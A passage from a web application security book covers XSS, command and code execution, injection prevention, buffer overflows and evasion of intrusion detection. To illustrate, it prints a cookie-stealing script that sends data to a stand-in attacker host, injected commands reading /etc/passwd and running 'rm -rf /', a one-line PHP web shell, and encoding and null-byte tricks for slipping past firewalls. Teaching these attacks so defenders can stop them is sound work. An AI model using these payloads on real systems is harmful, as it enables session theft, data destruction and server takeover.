This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with malicious payload. As a result, malicious code will be executed in the security context of the browser.

Suppose a script contains an insecure PHP code fragment such as the following:

<? echo $_REQUEST["param"] ?>

It can be attacked with a URL similar to this one:

http://www.example.com/xss.php?param=<script>alert(document.location)</script>

The final page will contain the JavaScript code given to the script as a parameter. Opening such a page will result in a JavaScript pop-up box appearing on the screen (in this case displaying the contents of the document.location variable) though that is not what the original page author intended. This is a proof of concept you can use to test if a script is vulnerable to cross-site scripting attacks.

Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database. Whenever a request is made to see the attacker’s registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time.

XSS attacks can have some of the following consequences:

Deception: If attackers can control the HTML markup, they can make the page look any way they want. Since URLs are limited in size, they cannot be used directly to inject a lot of content. But there is enough space to inject a frame into the page and to point the frame to a server controlled by an attacker. A large injected frame can cover the content that would normally appear on the page (or push it outside the visible browser area). When a successful deception attack takes place, the user will see a trusted location in the location bar and read the content supplied by the attacker (a handy way of publishing false news on the Internet). This may lead to a successful phishing attack.
Collection of private user information: If an XSS attack is performed against a web site where users keep confidential information, a piece of JavaScript code can gain access to the displayed pages and forms and can collect the data and send it to a remote (evil) server.
Providing access to restricted web sites: Sometimes a user’s browser can go places the attacker’s browser cannot. This is often the case when the user is accessing a password-protected web site or accessing a web site where access is restricted based on an IP address.
Execution of malicious requests on behalf of the user: This is an extension from the previous point. Not only can the attacker access privileged information, but he can also perform requests without the user knowing. This can prove to be difficult in the case of an internal and well-guarded application, but a determined attacker can pull it off. This type of attack is a variation on XSS and is sometimes referred to as cross-site request forgery (CSRF). It’s a dangerous type of attack because, unlike XSS where the attacker must interact with the original application directly, CSRF attacks are carried out from the user’s IP address and the attacker becomes untraceable.
Client workstation takeover: Though most attention is given to XSS attacks that contain JavaScript code, XSS can be used to invoke other dangerous elements, such as Flash or Java programs or even ActiveX objects. Successful activation of an ActiveX object, for example, would allow the attacker to take full control over the workstation.
Compromising of the client: If the browser is not maintained and regularly patched, it may be possible for malicious code to compromise it. An unpatched browser is a flaw of its own, the XSS attack only helps to achieve the compromise.
Session token stealing: The most dangerous consequence of an XSS attack is having a session token stolen. (Session management mechanics were discussed earlier in this chapter.) A person with a stolen session token has as much power as the user the token belongs to. Imagine an e-commerce system that works with two classes of users: buyers and administrators. Anyone can be a buyer (the more the better) but only company employees can work as administrators. A cunning criminal may register with the site as a buyer and smuggle a fragment of JavaScript code in the registration details (in the name field, for example). Sooner or later (the attacker may place a small order to speed things up, especially if it is a smaller shop) one of the administrators will access her registration details, and the session token will be transmitted to the attacker. Notified about the token, the attacker will effortlessly log into the application as the administrator. If written well, the malicious code will be difficult to detect. It will probably be reused many times as the attacker explores the administration module.

In our first XSS example, we displayed the contents of the document.location variable in a dialog box. The value of the cookie is stored in document.cookie. To steal a cookie, you must be able to send the value somewhere else. An attacker can do that with the following code:

<script>document.write('<img src=http://www.evilexample.com/'
+ document.cookie>)</script>

If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely:

<script src=http://www.evilexample.com/script.js></script>

Note

Though these examples show how a session token is stolen when it is stored in a cookie, nothing in cookies makes them inherently insecure. All session token transport mechanisms are equally vulnerable to session hijacking via XSS.

XSS attacks can be difficult to detect because most action takes place at the browser, and there are no traces at the server. Usually, only the initial attack can be found in server logs. If one can perform an XSS attack using a POST request, then nothing will be recorded in most cases, since few deployments record POST request bodies.

One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies used for session management only. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, only Internet Explorer supports this feature.

XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe.

XSS attack resources

“The Cross Site Scripting FAQ” by Robert Auger (http://www.cgisecurity.com/articles/xss-faq.txt)
“Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests“ by CERT Coordination Center (http://www.cert.org/advisories/CA-2000-02.html)
“Understanding Malicious Content Mitigation for Web developers“ by CERT Coordination Center (http://www.cert.org/tech_tips/malicious_code_mitigation.html)
“Cross-Site Scripting” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf)
“Cross-Site Tracing (XST)” by Jeremiah Grossman (WhiteHat Security) (http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf)
“Second-order Code Injection Attacks” by Gunter Ollmann (NGS) (http://www.nextgenss.com/papers/SecondOrderCodeInjection.pdf)
“Divide and Conquer, HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics“ by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf)

Command Execution

Command execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data.

Command executions are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code:

$output = `ls -al /home/$username`;
echo $output;

This code is meant to display a list of files in a folder. If a semicolon is used in the input, it will mark the end of the first command, and the beginning of the second. The second command can be anything you want. The invocation:

http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd

It will display the contents of the passwd file on the server.

Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:

Execute any binary on the server (use your imagination)
Start a Telnet server and log into the server with privileges of the web server user
Download other binaries from public servers
Download and compile tool source code
Perform exploits to gain root access

The most commonly used attack vector for command execution is mail sending in form-to-email scripts. These scripts are typically written in Perl. They are written to accept data from a POST request, construct the email message, and use sendmail to send it. A vulnerable code segment in Perl could look like this:

# send email to the user
open(MAIL, "|/usr/lib/sendmail $email");
print MAIL "Thank you for contacting us.\n";
close MAIL;

This code never checks whether the parameter $email contains only the email address. Since the value of the parameter is used directly on the command line an attacker could terminate the email address using a semicolon, and execute any other command on the system.

http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/

Code Execution

Code execution is a variation of command execution. It refers to execution of the code (script) that runs in the web server rather than direct execution of operating system commands. The end result is the same because attackers will only use code execution to gain command execution, but the attack vector is different. If the attacker can upload a code fragment to the server (using FTP or file upload features of the application) and the vulnerable application contains an include( ) statement that can be manipulated, the statement can be used to execute the uploaded code. A vulnerable include() statement is usually similar to this:

include($_REQUEST["module"] . "/index.php");

Here is an example URL with which it can be used:

http://www.example.com/index.php?module=news

In this particular example, for the attack to work the attacker must be able to create a file called index.php anywhere on the server and then place the full path to it in the module parameter of the vulnerable script.

As discussed in Chapter 3, the allow_url_fopen feature of PHP is extremely dangerous and enabled by default. When it is used, any file operation in PHP will accept and use a URL as a filename. When used in combination with include(), PHP will download and execute a script from a remote server (!):

http://www.example.com/index.php?module=http://www.evilexample.com

Another feature, register_globals, can contribute to exploitation. Fortunately, this feature is disabled by default in recent PHP versions. I strongly advise you to keep it disabled. Even when the script is not using input data in the include() statement, it may use the value of some other variable to construct the path:

include($TEMPLATES . "/template.php");

With register_globals enabled, the attacker can possibly override the value of the $TEMPLATES variable, with the end result being the same:

http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com

It’s even worse if the PHP code only uses a request parameter to locate the file, like in the following example:

include($parameter);

When the register_globals option is enabled in a request that is of multipart/form-data type (the type of the request is determined by the attacker so he can choose to have the one that suits him best), PHP will store the uploaded file somewhere on disk and put the full path to the temporary file into the variable $parameter. The attacker can upload the malicious script and execute it in one go. PHP will even delete the temporary file at the end of request processing and help the attacker hide his tracks!

Sometimes some other problems can lead to code execution on the server if someone manages to upload a PHP script through the FTP server and get it to execute in the web server. (See the www.apache.org compromise mentioned near the end of the “SQL Injection” section for an example.)

A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image he will be able to execute anything on the server. He will often only upload a one-line script similar to this one:

<? passthru($cmd) ?>

Try it out for yourself and see how easy it can be.

Preventing Injection Attacks

Injection attacks can be prevented if proper thought is given to the problem in the software design phase. These attacks can occur anywhere where characters with a special meaning, metacharacters, are mixed with data. There are many types of metacharacters. Each system component can use different metacharacters for different purposes. In HTML, for example, special characters are &, <, >, “, and ’. Problems only arise if the programmer does not take steps to handle metacharacters properly.

To prevent injection attacks, a programmer needs to perform four steps:

Identify system components
Identify metacharacters for each component
Validate data on input of every component (e.g., to ensure a variable contains an email address, if it should)
Transform data on input of every component to neutralize metacharacters (e.g., to neutralize the ampersand character (&) that appears in user data and needs to be a part of an HTML page, it must be converted to &)

Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library.

The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation.

Buffer Overflows

Buffer overflow occurs when an attempt is made to use a limited-length buffer to store a larger piece of data. Because of the lack of boundary checking, some amount of data will be written to memory locations immediately following the buffer. When an attacker manipulates program input, supplying specially crafted data payload, buffer overflows can be used to gain control of the application.

Buffer overflows affect C-based languages. Since most web applications are scripted (or written in Java, which is not vulnerable to buffer overflows), they are seldom affected by buffer overflows. Still, a typical web deployment can contain many components written in C:

Web servers, such as Apache
Custom Apache modules
Application engines, such as PHP
Custom PHP modules
CGI scripts written in C
External systems

Note that external systems such as databases, mail servers, directory servers and other servers are also often programmed in C. That the application itself is scripted is irrelevant. If data crosses system boundaries to reach the external system, an attacker could exploit a vulnerability.

A detailed explanation of how buffer overflows work falls outside the scope of this book. Consult the following resources to learn more:

The Shellcoder’s Handbook: Discovering and Exploiting Security Holes by Jack Koziol et al. (Wiley)
“Practical Code Auditing” by Lurene A. Grenier (http://www.daemonkitty.net/lurene/papers/Audit.pdf)
“Buffer Overflows Demystified” by Murat Balaban (http://www.enderunix.org/docs/eng/bof-eng.txt)
“Smashing The Stack For Fun And Profit” by Aleph One (http://www.insecure.org/stf/smashstack.txt)
“Advanced Doug Lea’s malloc exploits” by jp@corest.com (http://www.phrack.org/phrack/61/p61-0x06_Advanced_malloc_exploits.txt)
“Taking advantage of nonterminated adjacent memory spaces” by twitch@vicar.org (http://www.phrack.org/phrack/56/p56-0x0e)

Evasion Techniques

Intrusion detection systems (IDSs) are an integral part of web application security. In Chapter 9, I introduced web application firewalls (also covered in Chapter 12), whose purpose is to detect and reject malicious requests.

Most web application firewalls are signature-based. This means they monitor HTTP traffic looking for signature matches, where this type of “signature” is a pattern that suggests an attack. When a request is matched against a signature, an action is taken (as specified by the configuration). But if an attacker modifies the attack payload in some way to have the same meaning for the target but not to resemble a signature the web application firewall is looking for, the request will go through. Techniques of attack payload modification to avoid detection are called evasion techniques.

Evasion techniques are a well-known tool in the TCP/IP-world, having been used against network-level IDS tools for years. In the web security world, evasion is somewhat new. Here are some papers on the subject:

“A look at whisker’s anti-IDS tactics” by Rain Forest Puppy (http://www.apachesecurity.net/archive/whiskerids.html)
“IDS Evasion Techniques and Tactics” by Kevin Timm (http://www.securityfocus.com/printable/infocus/1577)

Simple Evasion Techniques

We start with the simple yet effective evasion techniques:

Using mixed case characters: This technique can be useful for attackers when attacking platforms (e.g., Windows) where filenames are not case sensitive; otherwise, it is useless. Its usefulness rises, however, if the target Apache includes mod_speling as one of its modules. This module tries to find a matching file on disk, ignoring case and allowing up to one spelling mistake.
Character escaping: Sometimes people do not realize you can escape any character by preceding the character with a backslash character (\), and if the character does not have a special meaning, the escaped character will convert into itself. Thus, \d converts to d. It is not much but it is enough to fool an IDS. For example, an IDS looking for the pattern id would not detect a string i\d, which has essentially the same meaning.
Using whitespace: Using excessive whitespace, especially the less frequently thought of characters such as TAB and new line, can be an evasion technique. For example, if an attacker creates an SQL injection attempt using DELETE FROM (with two spaces in between the words instead of one), the attack will be undetected by an IDS looking for DELETE FROM (with just one space in between).

Path Obfuscation

Many evasion techniques are used in attacks against the filesystem. For example, many methods can obfuscate paths to make them less detectable:

Self-referencing directories: When a ./ combination is used in a path, it does not change the meaning but it breaks the sequence of characters in two. For example, /etc/passwd may be obfuscated to the equivalent /etc/./passwd.
Double slashes: Using double slashes is one of the oldest evasion techniques. For example, /etc/passwd may be written as /etc//passwd.
Path traversal: Path traversal occurs when a backreference is used to back out of the current folder, but the name of the folder is used again to advance. For example, /etc/passwd may be written as /etc/dummy/../passwd, and both versions are legal. This evasion technique can be used against application code that performs a file download to make it disclose an arbitrary file on the filesystem. Another use of the attack is to evade an IDS system looking for well-known patterns in the traffic (/etc/passwd is one example).
Windows folder separator: When the web server is running on Windows, the Windows-specific folder separator \ can be used. For example, ../../cmd.exe may be written as ..\..\cmd.exe.
IFS evasion: Internal Field Separator (IFS) is a feature of some UNIX shells (sh and bash, for example) that allows the user to change the field separator (normally, a whitespace character) to something else. After you execute an IFS=X command on the shell command line, you can type CMD=X/bin/catX/etc/passwd;eval$CMD to display the contents of the /etc/passwd file on screen.

URL Encoding

Some characters have a special meaning in URLs, and they have to be encoded if they are going to be sent to an application rather than interpreted according to their special meanings. This is what URL encoding is for. (See RFC 1738 at http://www.ietf.org/rfc/rfc1738.txt and RFC 2396 at http://www.ietf.org/rfc/rfc2396.txt.) I showed URL encoding several times in this chapter, and it is an essential technique for most web application attacks.

It can also be used as an evasion technique against some network-level IDS systems. URL encoding is mandatory only for some characters but can be used for any. As it turns out, sending a string of URL-encoded characters may help an attack slip under the radar of some IDS tools. In reality, most tools have improved to handle this situation.

Sometimes, rarely, you may encounter an application that performs URL decoding twice. This is not correct behavior according to standards, but it does happen. In this case, an attacker could perform URL encoding twice.

The URL:

http://www.example.com/paynow.php?p=attack

becomes:

http://www.example.com/paynow.php?p=%61%74%74%61%63%6B

when encoded once (since %61 is an encoded a character, %74 is an encoded t character, and so on), but:

http://www.example.com/paynow.php?p=%2561%2574%2574%2561%2563%256B

when encoded twice (where %25 represents a percent sign).

If you have an IDS watching for the word “attack”, it will (rightly) decode the URL only once and fail to detect the word. But the word will reach the application that decodes the data twice.

There is another way to exploit badly written decoding schemes. As you know, a character is URL-encoded when it is represented with a percentage sign, followed by two hexadecimal digits (0-F, representing the values 0-15). However, some decoding functions never check to see if the two characters following the percentage sign are valid hexadecimal digits. Here is what a C function for handling the two digits might look like:

unsigned char x2c(unsigned char *what) {    
    unsigned char c0 = toupper(what[0]);
    unsigned char c1 = toupper(what[1]);
    unsigned char digit;
   
    digit = ( c0 >= 'A' ? c0 - 'A' + 10 : c0 - '0' );
    digit = digit * 16;
    digit = digit + ( c1 >= 'A' ? c1 - 'A' + 10 : c1 - '0' );
   
    return digit;
}

This code does not do any validation. It will correctly decode valid URL-encoded characters, but what happens when an invalid combination is supplied? By using higher characters than normally allowed, we could smuggle a slash character, for example, without an IDS noticing. To do so, we would specify XV for the characters since the above algorithm would convert those characters to the ASCII character code for a slash.

The URL:

http://www.example.com/paynow.php?p=/etc/passwd

would therefore be represented by:

http://www.example.com/paynow.php?p=%XVetc%XVpasswd

Unicode Encoding

Unicode attacks can be effective against applications that understand it. Unicode is the international standard whose goal is to represent every character needed by every written human language as a single integer number (see http://en.wikipedia.org/wiki/Unicode). What is known as Unicode evasion should more correctly be referenced as UTF-8 evasion. Unicode characters are normally represented with two bytes, but this is impractical in real life. First, there are large amounts of legacy documents that need to be handled. Second, in many cases only a small number of Unicode characters are needed in a document, so using two bytes per character would be wasteful.

Note

Internet Information Server (IIS) supports a special (nonstandard) way of representing Unicode characters, designed to resemble URL encoding. If a letter “u” comes after the percentage sign, then the four bytes that follow are taken to represent a full Unicode character. This feature has been used in many attacks carried out against IIS servers. You will need to pay attention to this type of attack if you are maintaining an Apache-based reverse proxy to protect IIS servers.

UTF-8, a transformation format of ISO 10646 (http://www.ietf.org/rfc/rfc2279.txt) allows most files to stay as they are and still be Unicode compatible. Until a special byte sequence is encountered, each byte represents a character from the Latin-1 character set. When a special byte sequence is used, two or more (up to six) bytes can be combined to form a single complex Unicode character.

One aspect of UTF-8 encoding causes problems: non-Unicode characters can be represented encoded. What is worse is multiple representations of each character can exist. Non-Unicode character encodings are known as overlong characters, and may be signs of attempted attack. There are five ways to represent an ASCII character. The five encodings below all decode to a new line character (0x0A):

0xc0 0x8A
0xe0 0x80 0x8A
0xf0 0x80 0x80 0x8A
0xf8 0x80 0x80 0x80 0x8A
0xfc 0x80 0x80 0x80 0x80 0x8A

Invalid UTF-8 encoding byte combinations are also possible, with similar results to invalid URL encoding.

Null-Byte Attacks

Using URL-encoded null bytes is an evasion technique and an attack at the same time. This attack is effective against applications developed using C-based programming languages. Even with scripted applications, the application engine they were developed to work with is likely to be developed in C and possibly vulnerable to this attack. Even Java programs eventually use native file manipulation functions, making them vulnerable, too.

Internally, all C-based programming languages use the null byte for string termination. When a URL-encoded null byte is planted into a request, it often fools the receiving application, which happily decodes the encoding and plants the null byte into the string. The planted null byte will be treated as the end of the string during the program’s operation, and the part of the string that comes after it and before the real string terminator will practically vanish.

We looked at how a URL-encoded null byte can be used as an attack when we covered source code disclosure vulnerabilities in the “Source Code Disclosure” section. This vulnerability is rare in practice though Perl programs can be in danger of null-byte attacks, depending on how they are programmed.

Null-byte encoding is used as an evasion technique mainly against web application firewalls when they are in place. These systems are almost exclusively C-based (they have to be for performance reasons), making the null-byte evasion technique effective.

Web application firewalls trigger an error when a dangerous signature (pattern) is discovered. They may be configured not to forward the request to the web server, in which case the attack attempt will fail. However, if the signature is hidden after an encoded null byte, the firewall may not detect the signature, allowing the request through and making the attack possible.

To see how this is possible, we will look at a single POST request, representing an attempt to exploit a vulnerable form-to-email script and retrieve the passwd file:

POST /update.php HTTP/1.0
Host: www.example.com
Content-Type: application/x-form-urlencoded
Content-Length: 78
   
firstname=Ivan&lastname=Ristic%00&email=ivanr@webkreator.com;cat%20/etc/passwd

A web application firewall configured to watch for the /etc/passwd string will normally easily prevent such an attack. But notice how we have embedded a null byte at the end of the lastname parameter. If the firewall is vulnerable to this type of evasion, it may miss our command execution attack, enabling us to continue with compromise attempts.

SQL Evasion

Many SQL injection attacks use unique combinations of characters. An SQL comment --%20 is a good example. Implementing an IDS protection based on this information may make you believe you are safe. Unfortunately, SQL is too versatile. There are many ways to subvert an SQL query, keep it valid, but sneak it past an IDS. The first of the papers listed below explains how to write signatures to detect SQL injection attacks, and the second explains how all that effort is useless against a determined attacker:

“Detection of SQL Injection and Cross-site Scripting Attacks” by K. K. Mookhey and Nilesh Burghate (http://www.securityfocus.com/infocus/1768)
“SQL Injection Signatures Evasion” by Ofer Maor and Amichai Shulman (http://www.imperva.com/application_defense_center/white_papers/sql_injection_signa-tures_evasion.html)

“Determined attacker” is a recurring theme in this book. We are using imperfect techniques to protect web applications on the system administration level. They will protect in most but not all cases. The only proper way to deal with security problems is to fix vulnerable applications.

Web Application Security Resources

Web security is not easy because it requires knowledge of many different systems and technologies. The resources listed here are only a tip of the iceberg.

General Resources

HTTP: The Definitive Guide by David Gourley and Brian Totty (O’Reilly)
RFC 2616, “Hypertext Transfer Protocol HTTP/1.1” (http://www.ietf.org/rfc/rfc2616.txt)
HTML 4.01 Specification (http://www.w3.org/TR/html401/)
JavaScript Central (http://devedge.netscape.com/central/javascript/)
ECMAScript Language Specification (http://www.ecma-international.org/publica-tions/files/ecma-st/ECMA-262.pdf)
ECMAScript Components Specification (http://www.ecma-international.org/pub-lications/files/ecma-st/ECMA-290.pdf)

For anyone wanting to seriously explore web security, a fair knowledge of components (e.g., database systems) making up web applications is also necessary.

Web Application Security Resources

Web application security is a young discipline. Few books cover the subject in depth. Researchers everywhere, including individuals and company employees, regularly publish papers that show old problems in new light.

Hacking Exposed: Web Applications by Joel Scambray and Mike Shema (McGraw-Hill/Osborne)
Hack Notes: Web Security Portable Reference by Mike Shema (McGraw-Hill/Osborne)
Essential PHP Security by Chris Shiflett (O’Reilly)
Open Web Application Security Project (http://www.owasp.org)
“Guide to Building Secure Web Applications” by OWASP (Open Web Application Security Project) (http://www.owasp.org/documentation/guide.html)
SecurityFocus Web Application Security Mailing List (webappsec@securityfocus.com) (http://www.securityfocus.com/archive/107)
WebGoat (http://www.owasp.org/software/webgoat.html) (also discussed in the Appendix A)
WebMaven (http://webmaven.mavensecurity.com/) (also discussed in the Appendix A)
SecurityFocus (http://www.securityfocus.com)
CGISecurity (http://www.cgisecurity.com)
Web Application Security Consortium (http://www.webappsec.org)
Web Security Threat Classification (http://www.webappsec.org/threat.html)
ModSecurity Resource Center (http://www.modsecurity.org/db/resources/)
Web Security Blog (http://www.modsecurity.org/blog/)
The World Wide Web Security FAQ (http://www.w3.org/Security/Faq/)

10 Web Application Security